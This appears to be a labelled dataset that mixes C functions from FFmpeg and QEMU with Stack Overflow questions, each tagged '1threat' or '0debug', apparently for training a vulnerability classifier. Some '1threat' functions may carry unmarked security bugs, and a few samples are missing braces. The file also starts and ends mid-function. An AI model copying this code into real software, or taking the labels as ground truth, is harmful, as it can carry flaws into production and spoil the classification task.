av_log(c, AV_LOG_INFO, "Sinc scaler, ");
else if (flags & SWS_LANCZOS)
av_log(c, AV_LOG_INFO, "Lanczos scaler, ");
else if (flags & SWS_SPLINE)
av_log(c, AV_LOG_INFO, "Bicubic spline scaler, ");
else
av_log(c, AV_LOG_INFO, "ehh flags invalid?! ");
av_log(c, AV_LOG_INFO, "from %s to %s%s ",
sws_format_name(srcFormat),
#ifdef DITHER1XBPP
dstFormat == AV_PIX_FMT_BGR555 || dstFormat == AV_PIX_FMT_BGR565 ||
dstFormat == AV_PIX_FMT_RGB444BE || dstFormat == AV_PIX_FMT_RGB444LE ||
dstFormat == AV_PIX_FMT_BGR444BE || dstFormat == AV_PIX_FMT_BGR444LE ?
"dithered " : "",
#else
"",
#endif
sws_format_name(dstFormat));
if (INLINE_MMXEXT(cpu_flags))
av_log(c, AV_LOG_INFO, "using MMXEXT\n");
else if (INLINE_AMD3DNOW(cpu_flags))
av_log(c, AV_LOG_INFO, "using 3DNOW\n");
else if (INLINE_MMX(cpu_flags))
av_log(c, AV_LOG_INFO, "using MMX\n");
else if (PPC_ALTIVEC(cpu_flags))
av_log(c, AV_LOG_INFO, "using AltiVec\n");
else
av_log(c, AV_LOG_INFO, "using C\n");
av_log(c, AV_LOG_VERBOSE, "%dx%d -> %dx%d\n", srcW, srcH, dstW, dstH);
av_log(c, AV_LOG_DEBUG,
"lum srcW=%d srcH=%d dstW=%d dstH=%d xInc=%d yInc=%d\n",
c->srcW, c->srcH, c->dstW, c->dstH, c->lumXInc, c->lumYInc);
av_log(c, AV_LOG_DEBUG,
"chr srcW=%d srcH=%d dstW=%d dstH=%d xInc=%d yInc=%d\n",
c->chrSrcW, c->chrSrcH, c->chrDstW, c->chrDstH,
c->chrXInc, c->chrYInc);
}
c->swscale = ff_getSwsFunc(c);
return 0;
fail:
return -1;
}
| 1threat
|
Came up with serialization algorithm for strings, but only works for words that are < 10 letters long. Halp? : So I had a question about a serialization algorithm I just came up with it, wanted to know if it already exists and if there's a better version out there.
So we know normal algorithms use a delimiter and join words in a list, but then you have to look through the whole word for existence of the delimiter, escape, etc, or make the serialization algorithm not robust. I thought a more intuitive approach would be to use higher level languages like Python where `len()` is `O(1)` and prepend that to each word. So for example this code I attached.
Wouldn't this be faster because instead of going through every letter of every word we instead just go through every word? And then deserialization we don't have to look through every character to find the delimiter, we can just skip directly to the end of each word.
The only problem I see is that double digit sizes would cause problems, but I'm sure there's a way around that I haven't found yet.
It was suggested to me that [protocol buffers](https://developers.google.com/protocol-buffers/) are similar to this idea, but I haven't understood why yet.
def serialize(list_o_words):
return ''.join(str(len(word)) + word for word in list_o_words)
def deserialize(serialized_list_o_words):
index = 0
deserialized_list = []
while index < len(serialized_list_o_words):
word_length = int(serialized_list_o_words[index])
next_index = index + word_length + 1
deserialized_list.append(serialized_list_o_words[index+1:next_index])
index = next_index
return deserialized_list
serialized_list = "dick,for,breakfast,pussy,for,lunch,but,please,don't,munch,haba1,daba2".split(",")
print(serialize(serialized_list))
print(deserialize(serialize(serialized_list)) == serialized_list)
| 0debug
|
How can I create and run both an angular and react app in asp.net core 2.1 app? : <p>This <a href="https://docs.microsoft.com/en-us/aspnet/core/client-side/spa/angular?view=aspnetcore-2.1&tabs=visual-studio" rel="nofollow noreferrer">page</a> talks about creating an <strong>angular</strong> app in the <code>ClientApp</code> folder. I want to create a <strong>react</strong> app which can be accessed through another asp.net MVC route.</p>
<p>What changes I have to make in the asp.net core application created by the <strong>Visual Studio 2017</strong> to have both the SPAs running.</p>
| 0debug
|
How can I convert a .NET Core project to a .NET Framework project? : <p>I created a "Console App (.NET Core)" project in Visual Studio. Now I need to add a dependency that only works on .NET Framework 4.6+, not .NET Core.</p>
<p>Is there a way to convert my project to a full .NET Framework project?</p>
<hr>
<p>Here's what I've tried:</p>
<p>I went to the project properties and attempted to change the project framework, but I don't see the option I need in the dropdown:</p>
<p><a href="https://i.stack.imgur.com/FCln8.png" rel="noreferrer"><img src="https://i.stack.imgur.com/FCln8.png" alt="Only .NETCoreApp displays in the target framework list."></a></p>
<p>If I click "Install other frameworks..." I'm taken to <a href="https://www.microsoft.com/net/targeting" rel="noreferrer">a page</a> that says .NET Framework versions are included in Visual Studio 2017 -- which is exactly what I'm using to edit this project. This is where I got stuck.</p>
| 0debug
|
void init_paths(const char *prefix)
{
char pref_buf[PATH_MAX];
if (prefix[0] == '\0' ||
!strcmp(prefix, "/"))
return;
if (prefix[0] != '/') {
char *cwd = getcwd(NULL, 0);
size_t pref_buf_len = sizeof(pref_buf);
if (!cwd)
abort();
pstrcpy(pref_buf, sizeof(pref_buf), cwd);
pstrcat(pref_buf, pref_buf_len, "/");
pstrcat(pref_buf, pref_buf_len, prefix);
free(cwd);
} else
pstrcpy(pref_buf, sizeof(pref_buf), prefix + 1);
base = new_entry("", NULL, pref_buf);
base = add_dir_maybe(base);
if (base->num_entries == 0) {
g_free(base->pathname);
free(base->name);
free(base);
base = NULL;
} else {
set_parents(base, base);
}
}
| 1threat
|
Webpack 4: SCSS to CSS into separate file : <p>I would like to use Webpack 4 to transpile on one side my ES6 Javascript separately from my Sass:</p>
<ul>
<li>src/js/index.js → static/js/index.js</li>
<li>src/css/style.scss → static/css/style.css</li>
</ul>
<p>Currently my webpack configuration seems to correctly transpile the javascript into a bundle.js but I cannot get my SCSS to transpile to CSS correctly. </p>
<p>I would definitely try to debug somehow but since I'm very ignorant on Webpack internals I'm not sure how to do it. </p>
<p>Following my webpack.config.js:</p>
<pre><code>const ExtractTextPlugin = require('extract-text-webpack-plugin');
const path = require('path');
module.exports = {
mode: 'development',
entry: {
bundle: './src/js/index.js',
},
output: {
filename: '[name].js',
path: path.resolve('static/js')
},
module: {
rules: [{
test: /\.scss$/,
use: ExtractTextPlugin.extract({
fallback: 'style-loader',
use: [
{ loader: "css-loader" },
{
loader: "sass-loader",
options: {
includePaths: [
path.resolve("./src/css")
]
}
},
]
}),
}]
},
plugins: [
new ExtractTextPlugin({
filename: path.resolve('static/css/style.css')
})
],
}
</code></pre>
| 0debug
|
Specialized shouldComponentUpdate on PureComponent : <p>I am trying to create a component that shouldn't when a certain property is true, but should perform a shallow compare (the default for <code>PureComponent</code>).</p>
<p>I've tried doing the following behavior:</p>
<pre><code>export default class ContentsListView extends PureComponent<Props> {
shouldComponentUpdate(props: Props) {
if (props.selecting) {
return false;
}
return super.shouldComponentUpdate(props);
}
render() {
}
}
</code></pre>
<p>However, <code>super.shouldComponentUpdate</code> is not defined. Is there some way to "tap into" the shallow compare of <code>PureComponent</code> without writing my own?</p>
| 0debug
|
App not opened programatically? : I installed Meeseva app in my device. When i opened programmetically it's not opening.
if ([[UIApplication sharedApplication] canOpenURL:[NSURL URLWithString:@"Meeseva App://location?id=1"]]) {
NSString *mystr=[[NSString alloc] initWithFormat:@"Meeseva App://location?id=1"];
NSURL *myurl=[[NSURL alloc] initWithString:mystr];
[[UIApplication sharedApplication] openURL:myurl];
}
When I opened fb, twitter, google+ and etc... all are opening successfully.
Can any solve this this issue...
App link is...
https://itunes.apple.com/in/app/meeseva-app/id1121539928?mt=8
Is there any another way to open installed app programatically
| 0debug
|
Property does not exist on type 'object' : <p>I have the follow setup and when I loop through using <code>for...of</code> and get an error of Property "country" doesn not exist on type "object". Is this a correct way to loop through each object in array and compare the object property value?</p>
<pre><code>let countryProviders: object[];
export function GetAllProviders() {
allProviders = [
{ region: "r 1", country: "US", locale: "en-us", company: "co 1" },
{ region: "r 2", country: "China", locale: "zh-cn", company: "co 2" },
{ region: "r 4", country: "Korea", locale: "ko-kr", company: "co 4" },
{ region: "r 5", country: "Japan", locale: "ja-jp", company: "co 5" }
]
for (let providers of allProviders) {
if (providers.country === "US") { // error here
countryProviders.push(providers);
}
}
}
</code></pre>
| 0debug
|
Web Interface for my Swift App : I learned how to code in swift a little while back and created my first app. Now I'm trying to market it to customers, I realized that a web-interface might be what I need to scale this up to start attracting clients.
I use firebase as my backend now and would like to see what I can do to have a web interface that:
Allows customers to log in to see their unique data.
Update info on my firebase backend
is Scaleable.
I'm not sure where to start nor how long this process will take. Any one has any ideas on where to get started?
| 0debug
|
int avfilter_process_command(AVFilterContext *filter, const char *cmd, const char *arg, char *res, int res_len, int flags)
{
if(!strcmp(cmd, "ping")){
av_strlcatf(res, res_len, "pong from:%s %s\n", filter->filter->name, filter->name);
return 0;
}else if(!strcmp(cmd, "enable")) {
return set_enable_expr(filter, arg);
}else if(filter->filter->process_command) {
return filter->filter->process_command(filter, cmd, arg, res, res_len, flags);
return AVERROR(ENOSYS);
| 1threat
|
How to add a conditional to a redirect.php file? : if(){
header ('Location: http://www.misitio1.com');
}else{
header ('Location: http://www.misitio2.com');
}
I have this until now. How do I add the time to the conditional, and when the seconds or minutes are even, redirect to site1 and when odd redirect to site2.
| 0debug
|
How to get bin folder in ASP.NET Core 1.0 : <p>With asp.net core 1.0 There are lots of functionality added. But there is not way to get Bin Folder path. </p>
<p>Can anyone please know how we can get the bin folder path for asp.net core 1.0 application.</p>
| 0debug
|
int socket_connect(SocketAddress *addr, Error **errp,
NonBlockingConnectHandler *callback, void *opaque)
{
int fd;
switch (addr->type) {
case SOCKET_ADDRESS_KIND_INET:
fd = inet_connect_saddr(addr->u.inet, errp, callback, opaque);
break;
case SOCKET_ADDRESS_KIND_UNIX:
fd = unix_connect_saddr(addr->u.q_unix, errp, callback, opaque);
break;
case SOCKET_ADDRESS_KIND_FD:
fd = monitor_get_fd(cur_mon, addr->u.fd->str, errp);
if (fd >= 0 && callback) {
qemu_set_nonblock(fd);
callback(fd, NULL, opaque);
}
break;
default:
abort();
}
return fd;
}
| 1threat
|
void tcg_prologue_init(TCGContext *s)
{
s->code_buf = s->code_gen_prologue;
s->code_ptr = s->code_buf;
tcg_target_qemu_prologue(s);
flush_icache_range((tcg_target_ulong)s->code_buf,
(tcg_target_ulong)s->code_ptr);
| 1threat
|
How to combine two string in php : I want combine two words to get a list of other words containing its letters example :
jack & sara
jaca, jara, jacka, jacra, jsara, jacara, jackra, jasara, jackara, jacsara
sara & jack
sack, sark, sarak, sarck, sjack, sajack, sarack, sarjack
| 0debug
|
static int unpack_vectors(Vp3DecodeContext *s, GetBitContext *gb)
{
int j, k, l, sb_x, sb_y;
int coding_mode;
int motion_x[6];
int motion_y[6];
int last_motion_x = 0;
int last_motion_y = 0;
int prior_last_motion_x = 0;
int prior_last_motion_y = 0;
int current_macroblock;
int current_fragment;
if (s->keyframe)
return 0;
memset(motion_x, 0, 6 * sizeof(int));
memset(motion_y, 0, 6 * sizeof(int));
coding_mode = get_bits1(gb);
for (sb_y = 0; sb_y < s->y_superblock_height; sb_y++) {
for (sb_x = 0; sb_x < s->y_superblock_width; sb_x++) {
for (j = 0; j < 4; j++) {
int mb_x = 2*sb_x + (j>>1);
int mb_y = 2*sb_y + (((j>>1)+j)&1);
current_macroblock = mb_y * s->macroblock_width + mb_x;
if (mb_x >= s->macroblock_width || mb_y >= s->macroblock_height ||
(s->macroblock_coding[current_macroblock] == MODE_COPY))
continue;
switch (s->macroblock_coding[current_macroblock]) {
case MODE_INTER_PLUS_MV:
case MODE_GOLDEN_MV:
if (coding_mode == 0) {
motion_x[0] = motion_vector_table[get_vlc2(gb, s->motion_vector_vlc.table, 6, 2)];
motion_y[0] = motion_vector_table[get_vlc2(gb, s->motion_vector_vlc.table, 6, 2)];
} else {
motion_x[0] = fixed_motion_vector_table[get_bits(gb, 6)];
motion_y[0] = fixed_motion_vector_table[get_bits(gb, 6)];
}
if (s->macroblock_coding[current_macroblock] ==
MODE_INTER_PLUS_MV) {
prior_last_motion_x = last_motion_x;
prior_last_motion_y = last_motion_y;
last_motion_x = motion_x[0];
last_motion_y = motion_y[0];
}
break;
case MODE_INTER_FOURMV:
prior_last_motion_x = last_motion_x;
prior_last_motion_y = last_motion_y;
motion_x[4] = motion_y[4] = 0;
for (k = 0; k < 4; k++) {
current_fragment = BLOCK_Y*s->fragment_width + BLOCK_X;
for (l = 0; l < s->coded_fragment_list_index; l++)
if (s->coded_fragment_list[l] == current_fragment)
break;
if (l < s->coded_fragment_list_index) {
if (coding_mode == 0) {
motion_x[k] = motion_vector_table[get_vlc2(gb, s->motion_vector_vlc.table, 6, 2)];
motion_y[k] = motion_vector_table[get_vlc2(gb, s->motion_vector_vlc.table, 6, 2)];
} else {
motion_x[k] = fixed_motion_vector_table[get_bits(gb, 6)];
motion_y[k] = fixed_motion_vector_table[get_bits(gb, 6)];
}
last_motion_x = motion_x[k];
last_motion_y = motion_y[k];
} else {
motion_x[k] = 0;
motion_y[k] = 0;
}
motion_x[4] += motion_x[k];
motion_y[4] += motion_y[k];
}
motion_x[5]=
motion_x[4]= RSHIFT(motion_x[4], 2);
motion_y[5]=
motion_y[4]= RSHIFT(motion_y[4], 2);
break;
case MODE_INTER_LAST_MV:
motion_x[0] = last_motion_x;
motion_y[0] = last_motion_y;
break;
case MODE_INTER_PRIOR_LAST:
motion_x[0] = prior_last_motion_x;
motion_y[0] = prior_last_motion_y;
prior_last_motion_x = last_motion_x;
prior_last_motion_y = last_motion_y;
last_motion_x = motion_x[0];
last_motion_y = motion_y[0];
break;
default:
motion_x[0] = 0;
motion_y[0] = 0;
break;
}
for (k = 0; k < 4; k++) {
current_fragment =
BLOCK_Y*s->fragment_width + BLOCK_X;
if (s->macroblock_coding[current_macroblock] == MODE_INTER_FOURMV) {
s->all_fragments[current_fragment].motion_x = motion_x[k];
s->all_fragments[current_fragment].motion_y = motion_y[k];
} else {
s->all_fragments[current_fragment].motion_x = motion_x[0];
s->all_fragments[current_fragment].motion_y = motion_y[0];
}
}
for (k = 0; k < 2; k++) {
current_fragment = s->fragment_start[k+1] +
mb_y*(s->fragment_width>>1) + mb_x;
if (s->macroblock_coding[current_macroblock] == MODE_INTER_FOURMV) {
s->all_fragments[current_fragment].motion_x = motion_x[k+4];
s->all_fragments[current_fragment].motion_y = motion_y[k+4];
} else {
s->all_fragments[current_fragment].motion_x = motion_x[0];
s->all_fragments[current_fragment].motion_y = motion_y[0];
}
}
}
}
}
return 0;
}
| 1threat
|
static int init_muxer(AVFormatContext *s, AVDictionary **options)
{
int ret = 0, i;
AVStream *st;
AVDictionary *tmp = NULL;
AVCodecParameters *par = NULL;
AVOutputFormat *of = s->oformat;
const AVCodecDescriptor *desc;
AVDictionaryEntry *e;
if (options)
av_dict_copy(&tmp, *options, 0);
if ((ret = av_opt_set_dict(s, &tmp)) < 0)
goto fail;
if (s->priv_data && s->oformat->priv_class && *(const AVClass**)s->priv_data==s->oformat->priv_class &&
(ret = av_opt_set_dict2(s->priv_data, &tmp, AV_OPT_SEARCH_CHILDREN)) < 0)
goto fail;
#if FF_API_LAVF_AVCTX
FF_DISABLE_DEPRECATION_WARNINGS
if (s->nb_streams && s->streams[0]->codec->flags & AV_CODEC_FLAG_BITEXACT) {
if (!(s->flags & AVFMT_FLAG_BITEXACT)) {
#if FF_API_LAVF_BITEXACT
av_log(s, AV_LOG_WARNING,
"Setting the AVFormatContext to bitexact mode, because "
"the AVCodecContext is in that mode. This behavior will "
"change in the future. To keep the current behavior, set "
"AVFormatContext.flags |= AVFMT_FLAG_BITEXACT.\n");
s->flags |= AVFMT_FLAG_BITEXACT;
#else
av_log(s, AV_LOG_WARNING,
"The AVFormatContext is not in set to bitexact mode, only "
"the AVCodecContext. If this is not intended, set "
"AVFormatContext.flags |= AVFMT_FLAG_BITEXACT.\n");
#endif
}
}
FF_ENABLE_DEPRECATION_WARNINGS
#endif
if (s->nb_streams == 0 && !(of->flags & AVFMT_NOSTREAMS)) {
av_log(s, AV_LOG_ERROR, "No streams to mux were specified\n");
ret = AVERROR(EINVAL);
goto fail;
}
for (i = 0; i < s->nb_streams; i++) {
st = s->streams[i];
par = st->codecpar;
#if FF_API_LAVF_CODEC_TB
FF_DISABLE_DEPRECATION_WARNINGS
if (!st->time_base.num && st->codec->time_base.num) {
av_log(s, AV_LOG_WARNING, "Using AVStream.codec.time_base as a "
"timebase hint to the muxer is deprecated. Set "
"AVStream.time_base instead.\n");
avpriv_set_pts_info(st, 64, st->codec->time_base.num, st->codec->time_base.den);
}
FF_ENABLE_DEPRECATION_WARNINGS
#endif
#if FF_API_LAVF_AVCTX
FF_DISABLE_DEPRECATION_WARNINGS
if (st->codecpar->codec_type == AVMEDIA_TYPE_UNKNOWN &&
st->codec->codec_type != AVMEDIA_TYPE_UNKNOWN) {
av_log(s, AV_LOG_WARNING, "Using AVStream.codec to pass codec "
"parameters to muxers is deprecated, use AVStream.codecpar "
"instead.\n");
ret = avcodec_parameters_from_context(st->codecpar, st->codec);
if (ret < 0)
goto fail;
}
FF_ENABLE_DEPRECATION_WARNINGS
#endif
ret = avcodec_parameters_to_context(st->internal->avctx, st->codecpar);
if (ret < 0)
goto fail;
if (!st->time_base.num) {
if (par->codec_type == AVMEDIA_TYPE_AUDIO && par->sample_rate)
avpriv_set_pts_info(st, 64, 1, par->sample_rate);
else
avpriv_set_pts_info(st, 33, 1, 90000);
}
switch (par->codec_type) {
case AVMEDIA_TYPE_AUDIO:
if (par->sample_rate <= 0) {
av_log(s, AV_LOG_ERROR, "sample rate not set\n");
ret = AVERROR(EINVAL);
goto fail;
}
if (!par->block_align)
par->block_align = par->channels *
av_get_bits_per_sample(par->codec_id) >> 3;
break;
case AVMEDIA_TYPE_VIDEO:
if ((par->width <= 0 || par->height <= 0) &&
!(of->flags & AVFMT_NODIMENSIONS)) {
av_log(s, AV_LOG_ERROR, "dimensions not set\n");
ret = AVERROR(EINVAL);
goto fail;
}
if (av_cmp_q(st->sample_aspect_ratio, par->sample_aspect_ratio)
&& fabs(av_q2d(st->sample_aspect_ratio) - av_q2d(par->sample_aspect_ratio)) > 0.004*av_q2d(st->sample_aspect_ratio)
) {
if (st->sample_aspect_ratio.num != 0 &&
st->sample_aspect_ratio.den != 0 &&
par->sample_aspect_ratio.num != 0 &&
par->sample_aspect_ratio.den != 0) {
av_log(s, AV_LOG_ERROR, "Aspect ratio mismatch between muxer "
"(%d/%d) and encoder layer (%d/%d)\n",
st->sample_aspect_ratio.num, st->sample_aspect_ratio.den,
par->sample_aspect_ratio.num,
par->sample_aspect_ratio.den);
ret = AVERROR(EINVAL);
goto fail;
}
}
break;
}
desc = avcodec_descriptor_get(par->codec_id);
if (desc && desc->props & AV_CODEC_PROP_REORDER)
st->internal->reorder = 1;
if (of->codec_tag) {
if ( par->codec_tag
&& par->codec_id == AV_CODEC_ID_RAWVIDEO
&& ( av_codec_get_tag(of->codec_tag, par->codec_id) == 0
|| av_codec_get_tag(of->codec_tag, par->codec_id) == MKTAG('r', 'a', 'w', ' '))
&& !validate_codec_tag(s, st)) {
par->codec_tag = 0;
}
if (par->codec_tag) {
if (!validate_codec_tag(s, st)) {
char tagbuf[32], tagbuf2[32];
av_get_codec_tag_string(tagbuf, sizeof(tagbuf), par->codec_tag);
av_get_codec_tag_string(tagbuf2, sizeof(tagbuf2), av_codec_get_tag(s->oformat->codec_tag, par->codec_id));
av_log(s, AV_LOG_ERROR,
"Tag %s/0x%08x incompatible with output codec id '%d' (%s)\n",
tagbuf, par->codec_tag, par->codec_id, tagbuf2);
ret = AVERROR_INVALIDDATA;
goto fail;
}
} else
par->codec_tag = av_codec_get_tag(of->codec_tag, par->codec_id);
}
if (par->codec_type != AVMEDIA_TYPE_ATTACHMENT)
s->internal->nb_interleaved_streams++;
}
if (!s->priv_data && of->priv_data_size > 0) {
s->priv_data = av_mallocz(of->priv_data_size);
if (!s->priv_data) {
ret = AVERROR(ENOMEM);
goto fail;
}
if (of->priv_class) {
*(const AVClass **)s->priv_data = of->priv_class;
av_opt_set_defaults(s->priv_data);
if ((ret = av_opt_set_dict2(s->priv_data, &tmp, AV_OPT_SEARCH_CHILDREN)) < 0)
goto fail;
}
}
if (!(s->flags & AVFMT_FLAG_BITEXACT)) {
av_dict_set(&s->metadata, "encoder", LIBAVFORMAT_IDENT, 0);
} else {
av_dict_set(&s->metadata, "encoder", NULL, 0);
}
for (e = NULL; e = av_dict_get(s->metadata, "encoder-", e, AV_DICT_IGNORE_SUFFIX); ) {
av_dict_set(&s->metadata, e->key, NULL, 0);
}
if (options) {
av_dict_free(options);
*options = tmp;
}
if (s->oformat->init && (ret = s->oformat->init(s)) < 0) {
s->oformat->deinit(s);
goto fail;
}
return 0;
fail:
av_dict_free(&tmp);
return ret;
}
| 1threat
|
Django rest framework: Get detail view using a field other than primary key integer id : <p>My Product model has an extra field named "product_id" which is a uuid string. Now I can get the product details based on the primary key id. I want to change this to get the product details using "product_id" field.</p>
<p>My current urls.py</p>
<pre><code>url(r'^products/(?P<pk>[0-9]+)/$', views.ProductDetailCustom.as_view(), name='product-detail'),
</code></pre>
<p>Now am calling like this.</p>
<pre><code>http://127.0.0.1:8000/api/v1/products/1460
</code></pre>
<p>I want this should be like this.</p>
<pre><code>http://127.0.0.1:8000/api/v1/products/04396134-3c90-ea7b-24ba-1fb0db11dbe5
</code></pre>
<p>views.py</p>
<pre><code>class ProductDetailCustom(generics.RetrieveAPIView):
queryset = Product.objects.all()
serializer_class = ProductCustomSerializer
</code></pre>
<p>serializer.py</p>
<pre><code>class ProductCustomSerializer(serializers.ModelSerializer):
class Meta:
model = Product
fields = ('url', 'id','product_id', 'title', 'description','structure','date_created',)
</code></pre>
<p>I think I have to include a look field to achive this.</p>
| 0debug
|
int ff_vdpau_common_end_frame(AVCodecContext *avctx, AVFrame *frame,
struct vdpau_picture_context *pic_ctx)
{
VDPAUContext *vdctx = avctx->internal->hwaccel_priv_data;
AVVDPAUContext *hwctx = avctx->hwaccel_context;
VdpVideoSurface surf = ff_vdpau_get_surface_id(frame);
VdpStatus status;
int val;
val = ff_vdpau_common_reinit(avctx);
if (val < 0)
return val;
#if FF_API_BUFS_VDPAU
FF_DISABLE_DEPRECATION_WARNINGS
hwctx->info = pic_ctx->info;
hwctx->bitstream_buffers = pic_ctx->bitstream_buffers;
hwctx->bitstream_buffers_used = pic_ctx->bitstream_buffers_used;
hwctx->bitstream_buffers_allocated = pic_ctx->bitstream_buffers_allocated;
FF_ENABLE_DEPRECATION_WARNINGS
#endif
if (!hwctx->render) {
status = hwctx->render2(avctx, frame, (void *)&pic_ctx->info,
pic_ctx->bitstream_buffers_used, pic_ctx->bitstream_buffers);
} else
status = vdctx->render(vdctx->decoder, surf, (void *)&pic_ctx->info,
pic_ctx->bitstream_buffers_used,
pic_ctx->bitstream_buffers);
av_freep(&pic_ctx->bitstream_buffers);
#if FF_API_BUFS_VDPAU
FF_DISABLE_DEPRECATION_WARNINGS
hwctx->bitstream_buffers = NULL;
hwctx->bitstream_buffers_used = 0;
hwctx->bitstream_buffers_allocated = 0;
FF_ENABLE_DEPRECATION_WARNINGS
#endif
return vdpau_error(status);
}
| 1threat
|
static int load_input_picture(MpegEncContext *s, AVFrame *pic_arg){
AVFrame *pic=NULL;
int i;
const int encoding_delay= s->max_b_frames;
int direct=1;
if(pic_arg){
if(encoding_delay && !(s->flags&CODEC_FLAG_INPUT_PRESERVED)) direct=0;
if(pic_arg->linesize[0] != s->linesize) direct=0;
if(pic_arg->linesize[1] != s->uvlinesize) direct=0;
if(pic_arg->linesize[2] != s->uvlinesize) direct=0;
if(direct){
i= find_unused_picture(s, 1);
pic= (AVFrame*)&s->picture[i];
pic->reference= 3;
for(i=0; i<4; i++){
pic->data[i]= pic_arg->data[i];
pic->linesize[i]= pic_arg->linesize[i];
}
alloc_picture(s, (Picture*)pic, 1);
}else{
i= find_unused_picture(s, 0);
pic= (AVFrame*)&s->picture[i];
pic->reference= 3;
alloc_picture(s, (Picture*)pic, 0);
for(i=0; i<4; i++){
pic->data[i]+= 16;
}
if( pic->data[0] == pic_arg->data[0]
&& pic->data[1] == pic_arg->data[1]
&& pic->data[2] == pic_arg->data[2]){
}else{
int h_chroma_shift, v_chroma_shift;
avcodec_get_chroma_sub_sample(s->avctx->pix_fmt, &h_chroma_shift, &v_chroma_shift);
for(i=0; i<3; i++){
int src_stride= pic_arg->linesize[i];
int dst_stride= i ? s->uvlinesize : s->linesize;
int h_shift= i ? h_chroma_shift : 0;
int v_shift= i ? v_chroma_shift : 0;
int w= s->width >>h_shift;
int h= s->height>>v_shift;
uint8_t *src= pic_arg->data[i];
uint8_t *dst= pic->data[i];
if(src_stride==dst_stride)
memcpy(dst, src, src_stride*h);
else{
while(h--){
memcpy(dst, src, w);
dst += dst_stride;
src += src_stride;
}
}
}
}
}
pic->quality= pic_arg->quality;
pic->pict_type= pic_arg->pict_type;
pic->pts = pic_arg->pts;
if(s->input_picture[encoding_delay])
pic->display_picture_number= s->input_picture[encoding_delay]->display_picture_number + 1;
}
for(i=1; i<MAX_PICTURE_COUNT ; i++)
s->input_picture[i-1]= s->input_picture[i];
s->input_picture[encoding_delay]= (Picture*)pic;
return 0;
}
| 1threat
|
please help me for optimise sql function :
(@PaymentId int)
returns int
as
begin
Declare @viewedCount int
Select @viewedCount=Count(OtSrno) From OtTendersViewDetail
Where OTPaymentId=@PaymentId And OTPaymentId is not null
return (@viewedCount)
end
| 0debug
|
Can i change the title bar of Sublime text is black like brackets? : <p>How can i change the title bar of sublime text like this image? All black finish!</p>
<p><a href="https://i.stack.imgur.com/uGx7P.jpg" rel="noreferrer"><img src="https://i.stack.imgur.com/uGx7P.jpg" alt="enter image description here"></a></p>
| 0debug
|
def find_Min_Sum(a,b,n):
a.sort()
b.sort()
sum = 0
for i in range(n):
sum = sum + abs(a[i] - b[i])
return sum
| 0debug
|
Java code not working? (FileInputStream, StringTokenizer, String to primitive type conversion) : my code is just not working. The text file is in the same folder as my classes. I used the pathname, which worked, but I don't think that would work if I send the file to someone else. And converting the Strings to primitive type using parse methods isn't working, either. Not sure what I'm doing wrong. Can anyone help? Here is my code:
import java.util.Scanner;
import java.util.StringTokenizer;
import java.io.FileNotFoundException;
import java.io.FileInputStream;
public class TestInventory {
public static void main(String[] args) {
// TODO Auto-generated method stub
Inventory movieList = new Inventory();
Scanner inputStream = null;
try{
inputStream = new Scanner(new FileInputStream("movies_db.txt"));
}
catch(FileNotFoundException e){
System.out.println("File not found or could not be opened");
System.exit(0);
}
while(inputStream.hasNextLine()){
String s = inputStream.nextLine();
StringTokenizer st = new StringTokenizer(s, " - ");
String t1 = st.nextToken();
String t2 = st.nextToken();
String t3 = st.nextToken();
String t4 = st.nextToken();
int y = Integer.parseInt(t2);
double r = Double.parseDouble(t4);
int d = Integer.parseInt(t3);
Movie m = new Movie(t1, y, r, d);
movieList.addMovie(m);
}
| 0debug
|
static void g364fb_update_display(void *opaque)
{
G364State *s = opaque;
if (s->width == 0 || s->height == 0)
return;
if (s->width != ds_get_width(s->ds) || s->height != ds_get_height(s->ds)) {
qemu_console_resize(s->ds, s->width, s->height);
}
if (s->ctla & CTLA_FORCE_BLANK) {
g364fb_draw_blank(s);
} else if (s->depth == 8) {
g364fb_draw_graphic8(s);
} else {
error_report("g364: unknown guest depth %d", s->depth);
}
qemu_irq_raise(s->irq);
}
| 1threat
|
Could you please help me how to show the comments elements in the dish with using ng-repeat? : I want to show all the comments elements like a list by using the "ng-repeat" and "ng-controller" , but I don't know how to show the comments elements inside the dish !
like this :<br>
5 stars<br>
Imagine all the eatables, living in conFusion!<br>
John Lemon,oct. 17,2012
<script>
var app = angular.module('confusionApp',[]);
app.controller('dishDetailController', function() {
this.filtText= '';
var dish=[
{
name:'Uthapizza',
image: 'images/uthapizza.png',
category: 'mains',
lable:'Hot',
price:'4.99',
description:'A unique combination of Indian Uthappam (pancake) and Italian pizza, topped with Cerignola olives, ripe vine cherry tomatoes, Vidalia onion, Guntur chillies and Buffalo Paneer.',
comments: [
{
rating:5,
comment:"Imagine all the eatables, living in conFusion!",
author:"John Lemon",
date:"2012-10-16T17:57:28.556094Z"
},
{
rating:4,
comment:"Sends anyone to heaven, I wish I could get my mother-in-law to eat it!",
author:"Paul McVites",
date:"2014-09-05T17:57:28.556094Z"
},
{
rating:3,
comment:"Eat it, just eat it!",
author:"Michael Jaikishan",
date:"2015-02-13T17:57:28.556094Z"
},
{
rating:4,
comment:"Ultimate, Reaching for the stars!",
author:"Ringo Starry",
date:"2013-12-02T17:57:28.556094Z"
},
{
rating:2,
comment:"It's your birthday, we're gonna party!",
author:"25 Cent",
date:"2011-12-02T17:57:28.556094Z"
}
]
}];
this.dish = dish;
});
</script>
| 0debug
|
static unsigned int dec10_quick_imm(DisasContext *dc)
{
int32_t imm, simm;
int op;
imm = dc->ir & ((1 << 6) - 1);
simm = (int8_t) (imm << 2);
simm >>= 2;
switch (dc->opcode) {
case CRISV10_QIMM_BDAP_R0:
case CRISV10_QIMM_BDAP_R1:
case CRISV10_QIMM_BDAP_R2:
case CRISV10_QIMM_BDAP_R3:
simm = (int8_t)dc->ir;
LOG_DIS("bdap %d $r%d\n", simm, dc->dst);
LOG_DIS("pc=%x mode=%x quickimm %d r%d r%d\n",
dc->pc, dc->mode, dc->opcode, dc->src, dc->dst);
cris_set_prefix(dc);
if (dc->dst == 15) {
tcg_gen_movi_tl(cpu_PR[PR_PREFIX], dc->pc + 2 + simm);
} else {
tcg_gen_addi_tl(cpu_PR[PR_PREFIX], cpu_R[dc->dst], simm);
}
break;
case CRISV10_QIMM_MOVEQ:
LOG_DIS("moveq %d, $r%d\n", simm, dc->dst);
cris_cc_mask(dc, CC_MASK_NZVC);
cris_alu(dc, CC_OP_MOVE, cpu_R[dc->dst],
cpu_R[dc->dst], tcg_const_tl(simm), 4);
break;
case CRISV10_QIMM_CMPQ:
LOG_DIS("cmpq %d, $r%d\n", simm, dc->dst);
cris_cc_mask(dc, CC_MASK_NZVC);
cris_alu(dc, CC_OP_CMP, cpu_R[dc->dst],
